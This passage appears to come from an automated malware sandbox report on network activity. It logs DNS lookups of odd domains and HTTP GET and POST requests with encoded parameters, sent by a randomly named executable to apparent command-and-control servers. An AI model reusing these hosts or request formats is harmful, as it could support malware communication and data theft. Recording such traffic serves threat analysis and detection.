                                                                                                            Oct 7, 2024 15:55:47.914179087 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:47.914205074 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:47.914282084 CEST4998280192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:47.914299965 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:47.914731979 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:47.915040016 CEST4998280192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:47.937357903 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:47.960618973 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:47.960794926 CEST4998280192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:47.966938972 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:47.966953039 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:47.967062950 CEST4998280192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:47.969939947 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:47.969964027 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:47.969976902 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:47.970042944 CEST4998280192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:47.970089912 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:47.970101118 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:47.970294952 CEST4998280192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:47.970355988 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:47.970695972 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:47.970733881 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:47.970761061 CEST4998280192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:47.973891973 CEST4998280192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:47.992892981 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:47.992923021 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:47.993031025 CEST4998280192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:48.005441904 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:48.005494118 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:48.005647898 CEST4998280192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:48.053409100 CEST4998280192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:49.074100971 CEST4998380192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:49.079297066 CEST804998394.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:49.079420090 CEST4998380192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:49.086323023 CEST4998380192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:49.091190100 CEST804998394.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:50.373863935 CEST804998394.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:50.373985052 CEST804998394.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:50.374123096 CEST4998380192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:50.378151894 CEST4998380192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:50.384005070 CEST804998394.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:55.406833887 CEST4998480192.168.2.93.33.130.190
                                                                                                            Oct 7, 2024 15:55:55.413455009 CEST80499843.33.130.190192.168.2.9
                                                                                                            Oct 7, 2024 15:55:55.413531065 CEST4998480192.168.2.93.33.130.190
                                                                                                            Oct 7, 2024 15:55:55.424530983 CEST4998480192.168.2.93.33.130.190
                                                                                                            Oct 7, 2024 15:55:55.429591894 CEST80499843.33.130.190192.168.2.9
                                                                                                            Oct 7, 2024 15:55:55.864438057 CEST80499843.33.130.190192.168.2.9
                                                                                                            Oct 7, 2024 15:55:55.864504099 CEST4998480192.168.2.93.33.130.190
                                                                                                            Oct 7, 2024 15:55:56.928318977 CEST4998480192.168.2.93.33.130.190
                                                                                                            Oct 7, 2024 15:55:56.933321953 CEST80499843.33.130.190192.168.2.9
                                                                                                            Oct 7, 2024 15:55:58.289206028 CEST4998580192.168.2.93.33.130.190
                                                                                                            Oct 7, 2024 15:55:58.295213938 CEST80499853.33.130.190192.168.2.9
                                                                                                            Oct 7, 2024 15:55:58.295312881 CEST4998580192.168.2.93.33.130.190
                                                                                                            Oct 7, 2024 15:55:58.306138992 CEST4998580192.168.2.93.33.130.190
                                                                                                            Oct 7, 2024 15:55:58.311316013 CEST80499853.33.130.190192.168.2.9
                                                                                                            Oct 7, 2024 15:55:59.684597015 CEST80499853.33.130.190192.168.2.9
                                                                                                            Oct 7, 2024 15:55:59.684659004 CEST4998580192.168.2.93.33.130.190
                                                                                                            Oct 7, 2024 15:55:59.818964005 CEST4998580192.168.2.93.33.130.190
                                                                                                            Oct 7, 2024 15:55:59.824172020 CEST80499853.33.130.190192.168.2.9
                                                                                                            Oct 7, 2024 15:56:00.846481085 CEST4998680192.168.2.93.33.130.190
                                                                                                            Oct 7, 2024 15:56:00.851675034 CEST80499863.33.130.190192.168.2.9
                                                                                                            Oct 7, 2024 15:56:00.851762056 CEST4998680192.168.2.93.33.130.190
                                                                                                            Oct 7, 2024 15:56:00.865958929 CEST4998680192.168.2.93.33.130.190
                                                                                                            Oct 7, 2024 15:56:00.870873928 CEST80499863.33.130.190192.168.2.9
                                                                                                            Oct 7, 2024 15:56:00.871140957 CEST80499863.33.130.190192.168.2.9
                                                                                                            Oct 7, 2024 15:56:01.297004938 CEST80499863.33.130.190192.168.2.9
                                                                                                            Oct 7, 2024 15:56:01.299933910 CEST4998680192.168.2.93.33.130.190
                                                                                                            Oct 7, 2024 15:56:02.381467104 CEST4998680192.168.2.93.33.130.190
                                                                                                            Oct 7, 2024 15:56:02.387451887 CEST80499863.33.130.190192.168.2.9
                                                                                                            Oct 7, 2024 15:56:03.415838003 CEST4998780192.168.2.93.33.130.190
                                                                                                            Oct 7, 2024 15:56:03.421144009 CEST80499873.33.130.190192.168.2.9
                                                                                                            Oct 7, 2024 15:56:03.423413038 CEST4998780192.168.2.93.33.130.190
                                                                                                            Oct 7, 2024 15:56:03.511662006 CEST4998780192.168.2.93.33.130.190
                                                                                                            Oct 7, 2024 15:56:03.516693115 CEST80499873.33.130.190192.168.2.9
                                                                                                            Oct 7, 2024 15:56:06.821060896 CEST80499873.33.130.190192.168.2.9
                                                                                                            Oct 7, 2024 15:56:06.821106911 CEST80499873.33.130.190192.168.2.9
                                                                                                            Oct 7, 2024 15:56:06.823811054 CEST4998780192.168.2.93.33.130.190
                                                                                                            Oct 7, 2024 15:56:06.827507973 CEST4998780192.168.2.93.33.130.190
                                                                                                            Oct 7, 2024 15:56:06.832391977 CEST80499873.33.130.190192.168.2.9
                                                                                                            Oct 7, 2024 15:56:11.855611086 CEST4998880192.168.2.9209.74.95.29
                                                                                                            Oct 7, 2024 15:56:11.872035980 CEST8049988209.74.95.29192.168.2.9
                                                                                                            Oct 7, 2024 15:56:11.872265100 CEST4998880192.168.2.9209.74.95.29
                                                                                                            Oct 7, 2024 15:56:11.882992983 CEST4998880192.168.2.9209.74.95.29
                                                                                                            Oct 7, 2024 15:56:11.887938023 CEST8049988209.74.95.29192.168.2.9
                                                                                                            Oct 7, 2024 15:56:12.438560963 CEST8049988209.74.95.29192.168.2.9
                                                                                                            Oct 7, 2024 15:56:12.438580036 CEST8049988209.74.95.29192.168.2.9
                                                                                                            Oct 7, 2024 15:56:12.438592911 CEST8049988209.74.95.29192.168.2.9
                                                                                                            Oct 7, 2024 15:56:12.438604116 CEST8049988209.74.95.29192.168.2.9
                                                                                                            Oct 7, 2024 15:56:12.438615084 CEST8049988209.74.95.29192.168.2.9
                                                                                                            Oct 7, 2024 15:56:12.438627005 CEST8049988209.74.95.29192.168.2.9
                                                                                                            Oct 7, 2024 15:56:12.438637018 CEST8049988209.74.95.29192.168.2.9
                                                                                                            Oct 7, 2024 15:56:12.438636065 CEST4998880192.168.2.9209.74.95.29
                                                                                                            Oct 7, 2024 15:56:12.438648939 CEST8049988209.74.95.29192.168.2.9
                                                                                                            Oct 7, 2024 15:56:12.438654900 CEST8049988209.74.95.29192.168.2.9
                                                                                                            Oct 7, 2024 15:56:12.438683987 CEST4998880192.168.2.9209.74.95.29
                                                                                                            Oct 7, 2024 15:56:12.438889027 CEST8049988209.74.95.29192.168.2.9
                                                                                                            Oct 7, 2024 15:56:12.438924074 CEST4998880192.168.2.9209.74.95.29
                                                                                                            Oct 7, 2024 15:56:12.443571091 CEST8049988209.74.95.29192.168.2.9
                                                                                                            Oct 7, 2024 15:56:12.443618059 CEST8049988209.74.95.29192.168.2.9
                                                                                                            Oct 7, 2024 15:56:12.443629026 CEST8049988209.74.95.29192.168.2.9
                                                                                                            Oct 7, 2024 15:56:12.443654060 CEST4998880192.168.2.9209.74.95.29
                                                                                                            Oct 7, 2024 15:56:12.443660021 CEST8049988209.74.95.29192.168.2.9
                                                                                                            Oct 7, 2024 15:56:12.443696022 CEST4998880192.168.2.9209.74.95.29
                                                                                                            Oct 7, 2024 15:56:13.397517920 CEST4998880192.168.2.9209.74.95.29
                                                                                                            Oct 7, 2024 15:56:14.415644884 CEST4998980192.168.2.9209.74.95.29
                                                                                                            Oct 7, 2024 15:57:07.246644020 CEST80500043.33.130.190192.168.2.9
                                                                                                            Oct 7, 2024 15:57:07.675507069 CEST80500043.33.130.190192.168.2.9
                                                                                                            Oct 7, 2024 15:57:07.676850080 CEST5000480192.168.2.93.33.130.190
                                                                                                            Oct 7, 2024 15:57:08.759748936 CEST5000480192.168.2.93.33.130.190
                                                                                                            Oct 7, 2024 15:57:08.764945030 CEST80500043.33.130.190192.168.2.9
                                                                                                            Oct 7, 2024 15:57:09.775859118 CEST5000580192.168.2.93.33.130.190
                                                                                                            Oct 7, 2024 15:57:09.780926943 CEST80500053.33.130.190192.168.2.9
                                                                                                            Oct 7, 2024 15:57:09.791682005 CEST5000580192.168.2.93.33.130.190
                                                                                                            Oct 7, 2024 15:57:09.798033953 CEST5000580192.168.2.93.33.130.190
                                                                                                            Oct 7, 2024 15:57:09.802867889 CEST80500053.33.130.190192.168.2.9
                                                                                                            Oct 7, 2024 15:57:11.305229902 CEST5000580192.168.2.93.33.130.190
                                                                                                            Oct 7, 2024 15:57:11.588546991 CEST80500053.33.130.190192.168.2.9
                                                                                                            Oct 7, 2024 15:57:11.593851089 CEST5000580192.168.2.93.33.130.190
                                                                                                            Oct 7, 2024 15:57:12.324089050 CEST5000680192.168.2.93.33.130.190
                                                                                                            Oct 7, 2024 15:57:12.329201937 CEST80500063.33.130.190192.168.2.9
                                                                                                            Oct 7, 2024 15:57:12.329274893 CEST5000680192.168.2.93.33.130.190
                                                                                                            Oct 7, 2024 15:57:12.343573093 CEST5000680192.168.2.93.33.130.190
                                                                                                            Oct 7, 2024 15:57:12.348767042 CEST80500063.33.130.190192.168.2.9
                                                                                                            Oct 7, 2024 15:57:12.348783016 CEST80500063.33.130.190192.168.2.9
                                                                                                            Oct 7, 2024 15:57:12.769650936 CEST80500063.33.130.190192.168.2.9
                                                                                                            Oct 7, 2024 15:57:12.769697905 CEST5000680192.168.2.93.33.130.190
                                                                                                            Oct 7, 2024 15:57:13.850702047 CEST5000680192.168.2.93.33.130.190
                                                                                                            Oct 7, 2024 15:57:13.862997055 CEST80500063.33.130.190192.168.2.9
                                                                                                            Oct 7, 2024 15:57:14.871839046 CEST5000780192.168.2.93.33.130.190
                                                                                                            Oct 7, 2024 15:57:15.071239948 CEST80500073.33.130.190192.168.2.9
                                                                                                            Oct 7, 2024 15:57:15.072968006 CEST5000780192.168.2.93.33.130.190
                                                                                                            Oct 7, 2024 15:57:15.079993963 CEST5000780192.168.2.93.33.130.190
                                                                                                            Oct 7, 2024 15:57:15.086036921 CEST80500073.33.130.190192.168.2.9
                                                                                                            Oct 7, 2024 15:57:15.518826008 CEST80500073.33.130.190192.168.2.9
                                                                                                            Oct 7, 2024 15:57:15.518912077 CEST80500073.33.130.190192.168.2.9
                                                                                                            Oct 7, 2024 15:57:15.519633055 CEST5000780192.168.2.93.33.130.190
                                                                                                            Oct 7, 2024 15:57:15.522353888 CEST5000780192.168.2.93.33.130.190
                                                                                                            Oct 7, 2024 15:57:15.527158022 CEST80500073.33.130.190192.168.2.9
                                                                                                            Oct 7, 2024 15:57:20.827886105 CEST5000880192.168.2.984.32.84.32
                                                                                                            Oct 7, 2024 15:57:20.832931042 CEST805000884.32.84.32192.168.2.9
                                                                                                            Oct 7, 2024 15:57:20.839930058 CEST5000880192.168.2.984.32.84.32
                                                                                                            Oct 7, 2024 15:57:20.851960897 CEST5000880192.168.2.984.32.84.32
                                                                                                            Oct 7, 2024 15:57:20.856910944 CEST805000884.32.84.32192.168.2.9
                                                                                                            Oct 7, 2024 15:57:21.283591032 CEST805000884.32.84.32192.168.2.9
                                                                                                            Oct 7, 2024 15:57:21.283750057 CEST5000880192.168.2.984.32.84.32
                                                                                                            Oct 7, 2024 15:57:22.366404057 CEST5000880192.168.2.984.32.84.32
                                                                                                            Oct 7, 2024 15:57:22.371436119 CEST805000884.32.84.32192.168.2.9
                                                                                                            Oct 7, 2024 15:57:23.384885073 CEST5000980192.168.2.984.32.84.32
                                                                                                            Oct 7, 2024 15:57:24.287506104 CEST805000984.32.84.32192.168.2.9
                                                                                                            Oct 7, 2024 15:57:24.287583113 CEST5000980192.168.2.984.32.84.32
                                                                                                            Oct 7, 2024 15:57:24.300533056 CEST5000980192.168.2.984.32.84.32
                                                                                                            Oct 7, 2024 15:57:24.305366039 CEST805000984.32.84.32192.168.2.9
                                                                                                            Oct 7, 2024 15:57:24.749145031 CEST805000984.32.84.32192.168.2.9
                                                                                                            Oct 7, 2024 15:57:24.749219894 CEST5000980192.168.2.984.32.84.32
                                                                                                            Oct 7, 2024 15:57:25.807912111 CEST5000980192.168.2.984.32.84.32
                                                                                                            Oct 7, 2024 15:57:25.812699080 CEST805000984.32.84.32192.168.2.9
                                                                                                            Oct 7, 2024 15:57:26.870102882 CEST5001080192.168.2.984.32.84.32
                                                                                                            Oct 7, 2024 15:57:26.875121117 CEST805001084.32.84.32192.168.2.9
                                                                                                            Oct 7, 2024 15:57:26.875236034 CEST5001080192.168.2.984.32.84.32
                                                                                                            Oct 7, 2024 15:57:26.892824888 CEST5001080192.168.2.984.32.84.32
                                                                                                            Oct 7, 2024 15:57:26.897953033 CEST805001084.32.84.32192.168.2.9
                                                                                                            Oct 7, 2024 15:57:26.897978067 CEST805001084.32.84.32192.168.2.9
                                                                                                            Oct 7, 2024 15:57:27.362802982 CEST805001084.32.84.32192.168.2.9
                                                                                                            Oct 7, 2024 15:57:27.362880945 CEST5001080192.168.2.984.32.84.32
                                                                                                            Oct 7, 2024 15:57:28.397905111 CEST5001080192.168.2.984.32.84.32
                                                                                                            Oct 7, 2024 15:57:28.402827978 CEST805001084.32.84.32192.168.2.9
                                                                                                            Oct 7, 2024 15:57:29.416260958 CEST5001180192.168.2.984.32.84.32
                                                                                                            Oct 7, 2024 15:57:29.421226025 CEST805001184.32.84.32192.168.2.9
                                                                                                            Oct 7, 2024 15:57:29.423480988 CEST5001180192.168.2.984.32.84.32
                                                                                                            Oct 7, 2024 15:57:29.430828094 CEST5001180192.168.2.984.32.84.32
                                                                                                            Oct 7, 2024 15:57:29.435651064 CEST805001184.32.84.32192.168.2.9
                                                                                                            Oct 7, 2024 15:57:29.867510080 CEST805001184.32.84.32192.168.2.9
                                                                                                            Oct 7, 2024 15:57:29.867527962 CEST805001184.32.84.32192.168.2.9
                                                                                                            Oct 7, 2024 15:57:29.867538929 CEST805001184.32.84.32192.168.2.9
                                                                                                            Oct 7, 2024 15:57:29.867597103 CEST805001184.32.84.32192.168.2.9
                                                                                                            Oct 7, 2024 15:57:29.867607117 CEST805001184.32.84.32192.168.2.9
                                                                                                            Oct 7, 2024 15:57:29.867618084 CEST805001184.32.84.32192.168.2.9
                                                                                                            Oct 7, 2024 15:57:29.867628098 CEST805001184.32.84.32192.168.2.9
                                                                                                            Oct 7, 2024 15:57:29.867640018 CEST805001184.32.84.32192.168.2.9
                                                                                                            Oct 7, 2024 15:57:29.867671967 CEST5001180192.168.2.984.32.84.32
                                                                                                            Oct 7, 2024 15:57:29.867739916 CEST5001180192.168.2.984.32.84.32
                                                                                                            Oct 7, 2024 15:57:29.867793083 CEST805001184.32.84.32192.168.2.9
                                                                                                            Oct 7, 2024 15:57:29.867804050 CEST805001184.32.84.32192.168.2.9
                                                                                                            Oct 7, 2024 15:57:29.867854118 CEST5001180192.168.2.984.32.84.32
                                                                                                            Oct 7, 2024 15:57:29.977497101 CEST5001180192.168.2.984.32.84.32
                                                                                                            Oct 7, 2024 15:57:29.982511997 CEST805001184.32.84.32192.168.2.9
                                                                                                            Oct 7, 2024 15:57:35.114264011 CEST5001280192.168.2.9194.58.112.174
                                                                                                            Oct 7, 2024 15:57:35.119059086 CEST8050012194.58.112.174192.168.2.9
                                                                                                            Oct 7, 2024 15:57:35.119141102 CEST5001280192.168.2.9194.58.112.174
                                                                                                            Oct 7, 2024 15:57:35.131022930 CEST5001280192.168.2.9194.58.112.174
                                                                                                            Oct 7, 2024 15:57:35.135828018 CEST8050012194.58.112.174192.168.2.9
                                                                                                            Oct 7, 2024 15:57:35.779932022 CEST8050012194.58.112.174192.168.2.9
                                                                                                            Oct 7, 2024 15:57:35.779949903 CEST8050012194.58.112.174192.168.2.9
                                                                                                            Oct 7, 2024 15:57:35.779967070 CEST8050012194.58.112.174192.168.2.9
                                                                                                            Oct 7, 2024 15:57:35.779977083 CEST8050012194.58.112.174192.168.2.9
                                                                                                            Oct 7, 2024 15:57:35.780095100 CEST5001280192.168.2.9194.58.112.174
                                                                                                            Oct 7, 2024 15:57:35.780118942 CEST8050012194.58.112.174192.168.2.9
                                                                                                            Oct 7, 2024 15:57:35.781044006 CEST5001280192.168.2.9194.58.112.174
                                                                                                            Oct 7, 2024 15:57:37.257005930 CEST5001280192.168.2.9194.58.112.174
                                                                                                            Oct 7, 2024 15:57:38.276736975 CEST5001380192.168.2.9194.58.112.174
                                                                                                            Oct 7, 2024 15:57:38.282816887 CEST8050013194.58.112.174192.168.2.9
                                                                                                            Oct 7, 2024 15:57:38.282876968 CEST5001380192.168.2.9194.58.112.174
                                                                                                            Oct 7, 2024 15:57:38.297415972 CEST5001380192.168.2.9194.58.112.174
                                                                                                            Oct 7, 2024 15:57:38.304109097 CEST8050013194.58.112.174192.168.2.9
                                                                                                            Oct 7, 2024 15:57:38.948949099 CEST8050013194.58.112.174192.168.2.9
                                                                                                            Oct 7, 2024 15:57:38.948972940 CEST8050013194.58.112.174192.168.2.9
                                                                                                            Oct 7, 2024 15:57:38.948985100 CEST8050013194.58.112.174192.168.2.9
                                                                                                            Oct 7, 2024 15:57:38.949013948 CEST8050013194.58.112.174192.168.2.9
                                                                                                            Oct 7, 2024 15:57:38.949170113 CEST5001380192.168.2.9194.58.112.174
                                                                                                            Oct 7, 2024 15:57:38.949170113 CEST5001380192.168.2.9194.58.112.174
                                                                                                            Oct 7, 2024 15:57:38.949260950 CEST8050013194.58.112.174192.168.2.9
                                                                                                            Oct 7, 2024 15:57:38.949364901 CEST5001380192.168.2.9194.58.112.174
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 7, 2024 15:55:01.178348064 CEST | 192.168.2.9 | 1.1.1.1 | 0x43e0 | Standard query (0) | www.moritynomxd.xyz | A (IP address) | IN (0x0001) | false
Oct 7, 2024 15:55:27.619556904 CEST | 192.168.2.9 | 1.1.1.1 | 0x9863 | Standard query (0) | www.kovallo.cloud | A (IP address) | IN (0x0001) | false
Oct 7, 2024 15:55:40.994286060 CEST | 192.168.2.9 | 1.1.1.1 | 0x8aa5 | Standard query (0) | www.sppsuperplast.online | A (IP address) | IN (0x0001) | false
Oct 7, 2024 15:55:55.385942936 CEST | 192.168.2.9 | 1.1.1.1 | 0xa231 | Standard query (0) | www.tracy.club | A (IP address) | IN (0x0001) | false
Oct 7, 2024 15:56:11.838162899 CEST | 192.168.2.9 | 1.1.1.1 | 0x8ce | Standard query (0) | www.sterkus.xyz | A (IP address) | IN (0x0001) | false
Oct 7, 2024 15:56:25.403147936 CEST | 192.168.2.9 | 1.1.1.1 | 0xe574 | Standard query (0) | www.syncnodex.net | A (IP address) | IN (0x0001) | false
Oct 7, 2024 15:56:39.043411016 CEST | 192.168.2.9 | 1.1.1.1 | 0x6c00 | Standard query (0) | www.galaxyslot88rtp.lat | A (IP address) | IN (0x0001) | false
Oct 7, 2024 15:56:53.401046991 CEST | 192.168.2.9 | 1.1.1.1 | 0x5b2 | Standard query (0) | www.warriorsyndrome.net | A (IP address) | IN (0x0001) | false
Oct 7, 2024 15:57:07.198620081 CEST | 192.168.2.9 | 1.1.1.1 | 0xd34e | Standard query (0) | www.ks1x7i.vip | A (IP address) | IN (0x0001) | false
Oct 7, 2024 15:57:20.529004097 CEST | 192.168.2.9 | 1.1.1.1 | 0x3cbf | Standard query (0) | www.pakmartcentral.shop | A (IP address) | IN (0x0001) | false
Oct 7, 2024 15:57:34.995953083 CEST | 192.168.2.9 | 1.1.1.1 | 0xae03 | Standard query (0) | www.les-massage.online | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 7, 2024 15:54:29.700155973 CEST | 1.1.1.1 | 192.168.2.9 | 0xbba5 | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Oct 7, 2024 15:54:29.700155973 CEST | 1.1.1.1 | 192.168.2.9 | 0xbba5 | No error (0) | s-part-0017.t-0009.t-msedge.net | | 13.107.246.45 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 15:55:01.218092918 CEST | 1.1.1.1 | 192.168.2.9 | 0x43e0 | No error (0) | www.moritynomxd.xyz | | 172.81.61.224 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 15:55:27.667025089 CEST | 1.1.1.1 | 192.168.2.9 | 0x9863 | No error (0) | www.kovallo.cloud | kovallo.cloud | | CNAME (Canonical name) | IN (0x0001) | false
Oct 7, 2024 15:55:27.667025089 CEST | 1.1.1.1 | 192.168.2.9 | 0x9863 | No error (0) | kovallo.cloud | | 81.2.196.19 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 15:55:41.113018036 CEST | 1.1.1.1 | 192.168.2.9 | 0x8aa5 | No error (0) | www.sppsuperplast.online | sppsuperplast.online | | CNAME (Canonical name) | IN (0x0001) | false
Oct 7, 2024 15:55:41.113018036 CEST | 1.1.1.1 | 192.168.2.9 | 0x8aa5 | No error (0) | sppsuperplast.online | | 94.73.146.114 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 15:55:55.404248953 CEST | 1.1.1.1 | 192.168.2.9 | 0xa231 | No error (0) | www.tracy.club | tracy.club | | CNAME (Canonical name) | IN (0x0001) | false
Oct 7, 2024 15:55:55.404248953 CEST | 1.1.1.1 | 192.168.2.9 | 0xa231 | No error (0) | tracy.club | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 15:55:55.404248953 CEST | 1.1.1.1 | 192.168.2.9 | 0xa231 | No error (0) | tracy.club | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 15:56:11.849656105 CEST | 1.1.1.1 | 192.168.2.9 | 0x8ce | No error (0) | www.sterkus.xyz | | 209.74.95.29 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 15:56:25.702547073 CEST | 1.1.1.1 | 192.168.2.9 | 0xe574 | No error (0) | www.syncnodex.net | | 15.197.172.60 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 15:56:39.561825037 CEST | 1.1.1.1 | 192.168.2.9 | 0x6c00 | No error (0) | www.galaxyslot88rtp.lat | galaxyslot88rtp.lat | | CNAME (Canonical name) | IN (0x0001) | false
Oct 7, 2024 15:56:39.561825037 CEST | 1.1.1.1 | 192.168.2.9 | 0x6c00 | No error (0) | galaxyslot88rtp.lat | | 46.17.172.49 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 15:56:53.440731049 CEST | 1.1.1.1 | 192.168.2.9 | 0x5b2 | No error (0) | www.warriorsyndrome.net | warriorsyndrome.net | | CNAME (Canonical name) | IN (0x0001) | false
Oct 7, 2024 15:56:53.440731049 CEST | 1.1.1.1 | 192.168.2.9 | 0x5b2 | No error (0) | warriorsyndrome.net | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 15:56:53.440731049 CEST | 1.1.1.1 | 192.168.2.9 | 0x5b2 | No error (0) | warriorsyndrome.net | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 15:57:07.221554041 CEST | 1.1.1.1 | 192.168.2.9 | 0xd34e | No error (0) | www.ks1x7i.vip | ks1x7i.vip | | CNAME (Canonical name) | IN (0x0001) | false
Oct 7, 2024 15:57:07.221554041 CEST | 1.1.1.1 | 192.168.2.9 | 0xd34e | No error (0) | ks1x7i.vip | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 15:57:07.221554041 CEST | 1.1.1.1 | 192.168.2.9 | 0xd34e | No error (0) | ks1x7i.vip | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 15:57:20.822094917 CEST | 1.1.1.1 | 192.168.2.9 | 0x3cbf | No error (0) | www.pakmartcentral.shop | pakmartcentral.shop | | CNAME (Canonical name) | IN (0x0001) | false
Oct 7, 2024 15:57:20.822094917 CEST | 1.1.1.1 | 192.168.2.9 | 0x3cbf | No error (0) | pakmartcentral.shop | | 84.32.84.32 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 15:57:35.111866951 CEST | 1.1.1.1 | 192.168.2.9 | 0xae03 | No error (0) | www.les-massage.online | | 194.58.112.174 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49898 | 172.81.61.224 | 80 | 6568 | C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
Timestamp | Bytes transferred | Direction | Data
Oct 7, 2024 15:55:01.241875887 CEST | 415 | OUT | GET /v5tr/?WLUDu=SXq8yrvPVd3tf&EjLdUJJ=rKvRMuVKXCO914EMf6FJZqs15EwODFtrZQGlCKKDXZs+G4DSdFL+ryYGM1VkNXNOLhPAbMSex0AuWObt4o/1tiXGxnpWKIlAMdpeetvztbm0D0P/FQ== HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Host: www.moritynomxd.xyz
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49976 | 81.2.196.19 | 80 | 6568 | C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
Timestamp | Bytes transferred | Direction | Data
Oct 7, 2024 15:55:27.685478926 CEST | 671 | OUT | POST /kmgk/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 196
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: www.kovallo.cloud
                                                                                                            Origin: http://www.kovallo.cloud
                                                                                                            Referer: http://www.kovallo.cloud/kmgk/
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
Oct 7, 2024 15:55:28.483776093 CEST | 355 | IN | HTTP/1.1 404 Not Found
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 07 Oct 2024 13:55:28 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.9 | 49977 | 81.2.196.19 | 80 | 6568 | C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
Timestamp | Bytes transferred | Direction | Data
Oct 7, 2024 15:55:30.245855093 CEST | 695 | OUT | POST /kmgk/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 220
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: www.kovallo.cloud
